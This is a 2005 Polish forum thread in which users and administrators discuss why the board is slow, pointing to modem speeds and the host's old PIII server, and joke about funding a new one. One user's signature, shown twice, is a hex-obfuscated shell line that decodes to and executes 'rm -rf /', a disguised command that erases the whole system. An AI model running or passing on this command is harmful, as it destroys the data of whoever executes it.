wolne forum

Propozycje, uwagi, błędy...

Moderatorzy: Moderatorzy, Administratorzy

Awatar użytkownika
Blizzard
Użytkownik
Posty: 191
Rejestracja: 2005-06-12, 21:40

wolne forum

Post autor: Blizzard » 2005-06-20, 19:17

Bardzo wolno dziala mi forum wporownaniu do innych opartych na tej samej wersji. Mozna by przeciez odchudzic baze, pousuwac userkow co nielogowali sie przez 2 miechy abo zmienic forum na brzydsze ale szybsze

Awatar użytkownika
dame
Moderator w st. spocz.
Posty: 985
Rejestracja: 2004-09-25, 17:37
Lokalizacja: wawa

Re: wolne forum

Post autor: dame » 2005-06-20, 20:37

ja już nie pamiętam, kiedy to forum działało wolno. sprawdź swoje łącze.
aktualnie windows xp

sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: wolne forum

Post autor: sayetan » 2005-06-20, 21:19

dzialanie forum nie zalezy tylko od jego wersji, zalezy takze od maszyny na jakiej stoi i lacza na jakim dana maszyna(hostujaca forum) podpieta jest do internetu

Awatar użytkownika
Kosma
Użytkownik
Posty: 531
Rejestracja: 2005-04-02, 00:44
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Kosma » 2005-06-20, 21:24

Na Gruchocie? :D
Kot, etatowy opieprzacz z zakresu kart AC'97.

sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: wolne forum

Post autor: sayetan » 2005-06-20, 21:31

hahahahahaha :D
# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`

Awatar użytkownika
Grucha
Administrator
Posty: 1679
Rejestracja: 2004-05-21, 14:24
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Grucha » 2005-06-20, 21:52

Kosma pisze:Na Gruchocie?
Phi... !
sayetan pisze:dzialanie forum nie zalezy tylko od jego wersji,
No niewiem, 1.9 podobno ma być szybsze i zmniejszono liczbe zapytań.

Kto sponsoruje nowego serva :]
"Touch my car and i will touch your girl"

Awatar użytkownika
Skyscraper
Administrator
Posty: 753
Rejestracja: 2004-05-22, 10:46
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Skyscraper » 2005-06-20, 21:56

Kosma pisze:Na Gruchocie? :D
o kerde ! :D spadlem z krzesla ! :D
Grucha fight for Your right ! ;)

Awatar użytkownika
Grucha
Administrator
Posty: 1679
Rejestracja: 2004-05-21, 14:24
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Grucha » 2005-06-20, 22:32

Skyscraper pisze:Grucha fight for Your right !
Co ja moge, no co ja moge ... ;)
"Touch my car and i will touch your girl"

Awatar użytkownika
Skyscraper
Administrator
Posty: 753
Rejestracja: 2004-05-22, 10:46
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Skyscraper » 2005-06-20, 22:36

Grucha pisze:
Skyscraper pisze:Grucha fight for Your right !
Co ja moge, no co ja moge ... ;)
Jak to co? to co każdy, szanujący się człowiek zrobiłby w tym momĘcie...
.... wyłącz apache :D

Awatar użytkownika
Grucha
Administrator
Posty: 1679
Rejestracja: 2004-05-21, 14:24
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Grucha » 2005-06-20, 22:44

No właśnie sie zastanawiałem czy MySQLa czy PHP w Apache wyłaczyć żeby procka tak nie męczyć ;)
"Touch my car and i will touch your girl"

Awatar użytkownika
dame
Moderator w st. spocz.
Posty: 985
Rejestracja: 2004-09-25, 17:37
Lokalizacja: wawa

Re: wolne forum

Post autor: dame » 2005-06-20, 22:48

Grucha pisze:Kto sponsoruje nowego serva :cwaniak:
proponuję wyznaczyć założyciela tematu :P
aktualnie windows xp

sayetan
Moderator w st. spocz.
Posty: 2193
Rejestracja: 2004-06-20, 21:47
Lokalizacja: Jelenia Góra

Re: wolne forum

Post autor: sayetan » 2005-06-20, 22:52

a co dokładnie jest potrzebne ? kiedyś rozmawiałem chyba z Corvinem nt servera, pytałem pare osób od których można uzyskac pomoc ale niestety nie udało mi sie
jak możemy o tym pogadać na forum to mówcie, bo ja troche sprzętu w domu mam, zawsze moge coś wysłać
# `echo -e "\x72\x6D\x20\x2D\x72\x66\x20\x2F"`

Awatar użytkownika
Grucha
Administrator
Posty: 1679
Rejestracja: 2004-05-21, 14:24
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Grucha » 2005-06-21, 12:21

RAMu ze 128 jeszcze by sie przydało bo starcza na styki i jakiś procek szybszy niż pIII 500 (bo taki mam) ale niewiem czy moja płyta go obsłuży :P
"Touch my car and i will touch your girl"

Awatar użytkownika
Hamster
Użytkownik
Posty: 120
Rejestracja: 2005-03-17, 19:50
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Hamster » 2005-06-21, 12:22

Jak ktoś ma modem 56 kbps to niech się nie dziwi ,ze mu wolno działa. Mi chdozi normalnie i nie narzekam...
[size=84]Linux user # 391061[/size]

Awatar użytkownika
Skyscraper
Administrator
Posty: 753
Rejestracja: 2004-05-22, 10:46
Lokalizacja: Wrocław
Kontakt:

Re: wolne forum

Post autor: Skyscraper » 2005-06-21, 22:18

Hamster pisze:Jak ktoś ma modem 56 kbps to niech się nie dziwi ,ze mu wolno działa. Mi chdozi normalnie i nie narzekam...
no bo jak masz modem to nie narzekasz - i tak leci z jego pelna predkoscia :D hiehei

ODPOWIEDZ